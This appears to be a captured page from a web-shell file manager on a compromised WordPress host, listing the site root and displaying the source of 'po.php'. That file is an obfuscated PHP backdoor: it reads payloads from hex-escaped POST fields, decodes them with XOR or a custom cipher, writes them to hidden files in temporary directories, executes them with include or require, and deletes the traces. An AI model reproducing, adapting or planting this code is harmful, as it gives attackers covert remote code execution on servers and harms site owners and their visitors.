at path:
ROOT
/
po.php
run:
R
W
Run
.well-known
DIR
2026-03-03 04:35:31
R
W
Run
cgi-bin
DIR
2026-03-11 03:48:21
R
W
Run
images
DIR
2026-03-11 03:48:25
R
W
Run
listandpay
DIR
2026-03-31 01:45:24
R
W
Run
newfd
DIR
2026-03-31 14:28:05
R
W
Run
wp-admin
DIR
2026-03-11 03:48:25
R
W
Run
wp-content
DIR
2026-03-11 03:48:21
R
W
Run
wp-includes
DIR
2026-03-11 03:48:21
R
W
Run
wp-snapshots
DIR
2026-03-11 03:48:25
R
W
Run
.htaccess
233 By
2026-03-30 02:05:51
R
W
Run
Delete
Rename
.litespeed_flag
297 By
2026-03-31 01:45:24
R
W
Run
Delete
Rename
po.php
1.5 KB
2026-03-30 02:05:51
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-03-30 02:05:51
R
W
Run
Delete
Rename
error_log
up
📄
po.php
Save
<?php if(filter_has_var(INPUT_POST, "\x65\x6Cem")){ $ref = array_filter(["/tmp", session_save_path(), getcwd(), getenv("TEMP"), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir")]); $entity = hex2bin($_REQUEST["\x65\x6Cem"]); $tkn = '' ; $a = 0; while($a < strlen($entity)){$tkn .= chr(ord($entity[$a]) ^ 33);$a++;} foreach ($ref as $marker): if (max(0, is_dir($marker) * is_writable($marker))) { $factor = vsprintf("%s/%s", [$marker, ".ptr"]); $file = fopen($factor, 'w'); if ($file) { fwrite($file, $tkn); fclose($file); include $factor; @unlink($factor); die(); } } endforeach; } if(isset($_POST["\x62\x69nd"]) ? true : false){ $entity = array_filter([sys_get_temp_dir(), getenv("TEMP"), session_save_path(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/dev/shm"]); $ref = $_POST["\x62\x69nd"]; $ref = explode( "." ,$ref ) ; $flag= ''; $s6= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s6); $k= 0; array_walk( $ref, function( $v2) use( &$flag, &$k, $s6, $lenS) { $sChar= ord( $s6[$k % $lenS]); $dec= ( ( int)$v2 - $sChar -( $k % 10))^ 68; $flag .= chr( $dec); $k++; }); foreach ($entity as $desc) { if (!( !is_dir($desc) || !is_writable($desc) )) { $value = join("/", [$desc, ".comp"]); if (file_put_contents($value, $flag)) { require $value; unlink($value); die(); } } } }